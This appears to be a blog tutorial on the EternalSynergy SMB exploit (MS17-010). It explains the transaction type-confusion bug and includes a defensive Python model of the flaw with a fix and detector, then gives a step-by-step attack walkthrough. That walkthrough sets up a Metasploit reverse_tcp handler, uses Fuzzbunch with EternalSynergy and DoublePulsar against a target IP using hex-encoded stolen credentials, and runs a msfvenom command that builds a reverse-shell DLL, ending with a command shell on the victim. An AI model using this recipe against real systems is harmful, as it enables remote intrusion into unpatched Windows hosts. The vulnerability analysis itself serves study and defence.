Eternal Series - Part 4 | Eternal Synergy Remote Windows Exploitation

Introduction

Eternal Synergy is an SMBv3 authenticated exploit. Many of the exploitation steps are purely packet-based, as opposed to local shellcode execution. Like the other SMB vulnerabilities, this one was also addressed in MS17-010 as CVE-2017-0143. The exploit works up to Windows 8, but does not work against any newer platforms.

Vulnerability

MID (Multiplex ID) 

The MID is assigned by the client. All messages include a MID along with a PID (process ID, see below) to uniquely identify groups of commands belonging to the same logical thread of operation on the client node.

FID (File ID)

A file handle, representing an open file on the server. A FID returned from an Open or Create operation MUST be unique within an SMB connection.

UID (User ID)

A UID represents an authenticated SMB session (including those created using anonymous or guest authentication).

PID (Process ID) 

The PID is assigned by the client. The client SHOULD set this to a value that identifies the process on the client node that initiated the request.

TID (Tree ID)

A TID represents an open connection to a share, otherwise known as a tree connect.

SMB_COM_WRITE_ANDX

This request is used to write bytes to a regular file, a named pipe, or a directly accessible I/O device such as a serial port (COM) or printer port (LPT).

SMB_COM_TRANSACTION_SECONDARY 

The SMB_COM_TRANSACTION_SECONDARY command is used to complete a data transfer initiated by an SMB_COM_TRANSACTION Request.

  1. The root cause of this vulnerability is that the command type of an SMB message is not taken into account when determining whether the message is part of a transaction. In other words, as long as the SMB header UID, PID, TID and OtherInfo fields match the corresponding transaction fields, the message is considered part of that transaction.
  2. Usually, the OtherInfo field stores a MID. In the case of SMB_COM_WRITE_ANDX messages, however, it stores a FID instead. This creates a potential message type confusion: given an existing SMB_COM_WRITE_ANDX transaction, an incoming SMB message with a MID equal to the transaction's FID would be included in that transaction.
  3. When an SMB message arrives, the appropriate handler copies its contents into the corresponding transaction buffer, namely InData. The SMB_COM_TRANSACTION_SECONDARY handler assumes that the InData address points to the start of the buffer.
  4. However, in the case of an SMB_COM_WRITE_ANDX transaction, each time an SMB message is received for that transaction, the InData address is updated to point to the end of the existing data.
  5. Leveraging the packet confusion, an attacker can insert an SMB_COM_TRANSACTION_SECONDARY message into an SMB_COM_WRITE_ANDX transaction. In that case InData points past the start of the buffer, so the SMB_COM_TRANSACTION_SECONDARY handler can overflow the buffer while copying the incoming message data.
  6. A series of SMB_COM_TRANSACTION messages is sent in order to allocate a pair of neighboring control and victim transactions. Specifically, "groom" packets contain SMB messages crafted to create the packet confusion, i.e. eligible to become a control transaction. "Bride" packets create transactions that are candidates for corruption, that is, victim transactions.
  7. The read primitive is exercised multiple times in order to discover the location of the srv!SrvTransaction2DispatchTable global pointer, which is used to trigger shellcode execution.
  8. The read primitive is again exercised multiple times to discover the base of ntoskrnl.exe. The RWX memory found above is used as a scratch page, where shellcode is written and executed and return values are stored.
  9. First, using the write primitive, the exploit shellcode is copied to the scratch page. Then an SMB_COM_TRANSACTION2 message is sent to execute the shellcode. The return value is saved at a fixed offset on the scratch page and leaked back to the attacker using the read primitive.
  10. Lastly, the scratch page is cleared, the attacker-provided shellcode is written to the pool-allocated page, and a message is sent to trigger execution.
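The matching flaw in points 1 to 5, as an added model that is not code from this article or from srv.sys: a transaction lookup keyed on the header fields the text names, once ignoring the command type (the bug) and once requiring the continuation to match the transaction's own command (the hardened form), plus a defender-side check that flags a TRANSACTION_SECONDARY that would be routed into a WRITE_ANDX transaction. The command codes are the documented SMB values; the table layout, field names and sample values are assumptions constructed for illustration.

```python
from dataclasses import dataclass

# Documented SMB command codes (MS-CIFS); everything else here is a constructed model.
SMB_COM_TRANSACTION = 0x25
SMB_COM_TRANSACTION_SECONDARY = 0x26
SMB_COM_WRITE_ANDX = 0x2F

@dataclass
class Transaction:
    command: int      # command that opened the transaction
    uid: int
    pid: int
    tid: int
    other_info: int   # MID normally; the FID for an SMB_COM_WRITE_ANDX transaction

@dataclass
class Message:
    command: int
    uid: int
    pid: int
    tid: int
    other_info: int   # header MID, or the FID carried by a WRITE_ANDX request

def find_transaction_vulnerable(table, msg):
    """Match on UID/PID/TID/OtherInfo only, ignoring command type: the flaw described above."""
    key = (msg.uid, msg.pid, msg.tid, msg.other_info)
    for t in table:
        if (t.uid, t.pid, t.tid, t.other_info) == key:
            return t
    return None

def find_transaction_fixed(table, msg):
    """Additionally require the message to be a continuation of the transaction's own command."""
    t = find_transaction_vulnerable(table, msg)
    if t is None:
        return None
    continues = {SMB_COM_TRANSACTION_SECONDARY: SMB_COM_TRANSACTION,
                 SMB_COM_WRITE_ANDX: SMB_COM_WRITE_ANDX}
    return t if continues.get(msg.command) == t.command else None

def is_type_confusion(table, msg):
    """Detection view: a TRANSACTION_SECONDARY the vulnerable lookup routes into a WRITE_ANDX transaction."""
    t = find_transaction_vulnerable(table, msg)
    return (t is not None and msg.command == SMB_COM_TRANSACTION_SECONDARY
            and t.command == SMB_COM_WRITE_ANDX)

# Constructed sample: an open WRITE_ANDX transaction on FID 0x4001 and a TRANSACTION_SECONDARY
# whose header MID happens to equal that FID.
TABLE = [Transaction(SMB_COM_WRITE_ANDX, uid=1, pid=0xFEFF, tid=2, other_info=0x4001)]
CONFUSED = Message(SMB_COM_TRANSACTION_SECONDARY, uid=1, pid=0xFEFF, tid=2, other_info=0x4001)
```

The vulnerable lookup hands the confused message to the WRITE_ANDX transaction, while the command-aware lookup rejects it and the detector flags it.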

Exploit

Step 1 : Setup Metasploit

#use exploit/multi/handler

#set payload windows/x64/shell/reverse_tcp 

#set LHOST <Internal IP>

#exploit

Step 2 : Setup Fuzzbunch

#Default Target IP Address [] : <Target IP>

#Default Callback IP Address [] : <Internal IP>

#Use Redirection [yes] : no

Press Enter

Create a New Project

#use DoublePulsar

Press Enter 5 times

Set x64 architecture : 1

Press Enter once

Set path of output file : c:\shell.bin

Press Enter 3 times

DoublePulsar Succeeds!!!

#use EternalSynergy

Press Enter 6 times

Choose Password in the Credentials Menu (Option 3)

Convert the target user's username into hex format

Enter the hex value for the username

Convert the target user's password into hex format

Enter the hex value for the password

Press Enter 7 times

Enter path to shell.bin : c:\shell.bin

Press Enter once

Press Enter 9 times

EternalSynergy will start executing…

EternalSynergy Succeeds!!!

Switch to terminal and generate a msfvenom payload dll

#msfvenom -p windows/x64/shell/reverse_tcp lhost=<Internal IP> lport=<Port> -f dll > exploit.dll

Switch to Fuzzbunch

#use DoublePulsar

Press Enter 6 times

Set Function : 2

Set path to DLL Payload : c:\exploit.dll

Press Enter 6 times

DoublePulsar will start executing…

Success

We get a Command Shell Session.

More articles by Abhijeet Singh